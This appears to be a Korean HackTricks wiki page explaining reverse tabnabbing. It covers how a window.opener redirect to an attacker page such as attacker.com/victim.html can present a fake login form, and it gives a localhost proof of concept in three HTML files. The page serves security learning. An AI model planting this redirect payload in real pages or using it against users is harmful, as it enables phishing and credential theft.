tip
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
설명
공격자가 피해자가 클릭할 <a
태그의 href
인자를 제어할 수 있는 상황에서, 공격자는 이 링크를 자신의 제어 하에 있는 웹(즉, 악성 웹사이트)으로 지정합니다. 그런 다음, 피해자가 링크를 클릭하고 공격자의 웹사이트에 접근하면, 이 악성 웹사이트는 자바스크립트 객체 **window.opener
**를 통해 원래 페이지를 제어할 수 있습니다.
페이지에 **rel="opener"
**가 없지만 target="_blank"
가 포함되어 있고 **rel="noopener"
**가 없으면, 또한 취약할 수 있습니다.
이 행동을 악용하는 일반적인 방법은 window.opener.location = https://attacker.com/victim.html
을 통해 원래 웹의 위치를 공격자가 제어하는 웹으로 변경하는 것입니다. 이 웹은 원래 웹사이트처럼 보이도록 하여, 로그인 양식을 모방하고 사용자에게 자격 증명을 요청할 수 있습니다.
그러나 공격자가 이제 원래 웹사이트의 창 객체를 제어할 수 있으므로, 그는 이를 다른 방식으로 악용하여 은밀한 공격을 수행할 수 있습니다(아마도 자바스크립트 이벤트를 수정하여 그가 제어하는 서버로 정보를 유출할 수 있겠죠?).
개요
백 링크가 있는 경우
예방 속성이 사용되지 않을 때 부모 페이지와 자식 페이지 간의 링크:
백 링크가 없는 경우
예방 속성이 사용될 때 부모 페이지와 자식 페이지 간의 링크:
예제
다음 페이지를 폴더에 생성하고 python3 -m http.server
로 웹 서버를 실행합니다.
그런 다음, 접근 http://127.0.0.1:8000/
vulnerable.html, 클릭하여 링크를 클릭하고 원래 웹사이트의 URL이 변경되는 것을 주목하세요.
<!DOCTYPE html>
<html>
<body>
<h1>Victim Site</h1>
<a href="http://127.0.0.1:8000/malicious.html" target="_blank" rel="opener">Controlled by the attacker</a>
</body>
</html>
<!DOCTYPE html>
<html>
<body>
<script>
window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
</script>
</body>
</html>
<!DOCTYPE html>
<html>
<body>
<h1>New Malicious Site</h1>
</body>
</html>
Accessible properties
교차 출처 접근이 발생하는 시나리오에서는, opener JavaScript 객체 참조로 지칭되는 window JavaScript 클래스 인스턴스의 속성에 대해 악의적인 사이트가 접근할 수 있는 것은 다음과 같이 제한됩니다:
opener.closed
: 이 속성은 창이 닫혔는지 여부를 확인하기 위해 접근되며, 불리언 값을 반환합니다.opener.frames
: 이 속성은 현재 창 내의 모든 iframe 요소에 대한 접근을 제공합니다.opener.length
: 현재 창에 존재하는 iframe 요소의 수를 이 속성이 반환합니다.opener.opener
: 현재 창을 연 창에 대한 참조를 이 속성을 통해 얻을 수 있습니다.opener.parent
: 이 속성은 현재 창의 부모 창을 반환합니다.opener.self
: 이 속성은 현재 창 자체에 대한 접근을 제공합니다.opener.top
: 이 속성은 가장 상위의 브라우저 창을 반환합니다.
그러나 도메인이 동일한 경우, 악의적인 사이트는 window JavaScript 객체 참조에 의해 노출된 모든 속성에 접근할 수 있습니다.
Prevention
예방 정보는 HTML5 Cheat Sheet에 문서화되어 있습니다.
References
tip
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.